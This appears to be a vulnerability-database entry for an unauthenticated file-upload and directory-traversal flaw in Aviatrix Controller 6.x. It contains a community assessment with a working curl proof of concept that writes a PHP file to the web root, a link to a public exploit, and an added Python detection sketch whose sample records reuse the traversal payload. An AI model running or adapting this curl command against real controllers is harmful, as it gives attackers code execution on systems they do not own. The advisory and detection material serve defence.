Description
An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.
**Recent assessments:**
**JoyGhoshs** at October 09, 2021 6:33am UTC reported:
### Description
This vulnerability allows an attacker to create and store files on the Aviatrix controller. The exploitation phase doesn't need any user authentication or require any other user's interaction; it can simply be exploited using curl. Here is one example.

    curl -k https://aviatrix.domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/poc.php -d 'data=hello<?php echo "Vulnerable Poc";?>'

    # after executing the previous command, if the target is vulnerable, this will create a PHP file at this path

    https://vulnerable.target.com/v1/poc

An attacker can do this unauthenticated because many API calls do not enforce a check for authentication. So this allows an unauthenticated attacker to upload arbitrary files, including .php scripts, to the filesystem.

Or you can use this exploit to do the exploitation more easily: <https://github.com/JoyGhoshs/CVE-2021-40870>

Assessed Attacker Value: 3
Assessed Exploitability: 5
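
A detection and validation sketch for the pattern described in this assessment, added here as an example (not code from the assessment or from Aviatrix): it flags `account_name` values in POSTs to `/v1/backend1` that contain traversal, including percent-encoded forms, and correlates later `/v1/` requests for the file name that was written. The log-record shape, the allowlist pattern and the sample records are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote

API_PATH = "/v1/backend1"  # endpoint named in the assessment
# Assumed allowlist for legitimate account names; adjust to local naming rules.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded traversal is still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def account_name_findings(raw_name):
    """Return the reasons an account_name value is unsafe to use in a file path."""
    name = fully_decode(raw_name)
    reasons = []
    if "\x00" in name:
        reasons.append("nul-byte")
    if "/" in name or "\\" in name:
        reasons.append("path-separator")
    if ".." in name.replace("\\", "/").split("/"):
        reasons.append("dot-dot-segment")
    if not reasons and not SAFE_NAME.fullmatch(name):
        reasons.append("outside-allowlist")
    return reasons


def written_stem(raw_name):
    """File name (without extension) that a traversal value would create."""
    path = fully_decode(raw_name).replace("\\", "/")
    return posixpath.splitext(posixpath.basename(path))[0]


def scan(records):
    """Flag unsafe account_name writes and later /v1/ requests for the same file."""
    alerts, written = [], set()
    for rec in records:
        if rec["method"] == "POST" and rec["path"] == API_PATH:
            # parse_qs performs the first round of percent-decoding itself.
            form = parse_qs(rec.get("body", ""), keep_blank_values=True)
            for raw in form.get("account_name", []):
                reasons = account_name_findings(raw)
                if reasons:
                    alerts.append(("traversal-write", rec["src"], reasons))
                    stem = written_stem(raw)
                    if stem:
                        written.add(stem)
        elif rec["method"] == "GET" and rec["path"].startswith("/v1/"):
            stem = posixpath.splitext(posixpath.basename(rec["path"]))[0]
            if stem in written:
                alerts.append(("fetch-of-written-file", rec["src"], [rec["path"]]))
    return alerts


# Constructed sample records (documentation IP ranges, harmless data values).
SAMPLE_RECORDS = [
    {"src": "198.51.100.7", "method": "POST", "path": "/v1/backend1",
     "body": "CID=x&action=set_metric_gw_selections"
             "&account_name=/../../../var/www/php/poc.php&data=hello"},
    {"src": "198.51.100.7", "method": "GET", "path": "/v1/poc"},
    {"src": "192.0.2.10", "method": "POST", "path": "/v1/backend1",
     "body": "CID=abc&action=set_metric_gw_selections"
             "&account_name=prod-aws_01&data=1"},
    {"src": "203.0.113.5", "method": "POST", "path": "/v1/backend1",
     "body": "CID=x&action=set_metric_gw_selections"
             "&account_name=%252e%252e%252f%252e%252e%252ftmp%252fx&data=1"},
    {"src": "192.0.2.10", "method": "GET", "path": "/v1/index.html"},
]

if __name__ == "__main__":
    for kind, src, detail in scan(SAMPLE_RECORDS):
        print(kind, src, detail)
```

The same `account_name_findings` check can serve as server-side input validation before the value is ever joined into a file path; request bodies must be captured by a proxy or WAF for the log-based scan to work.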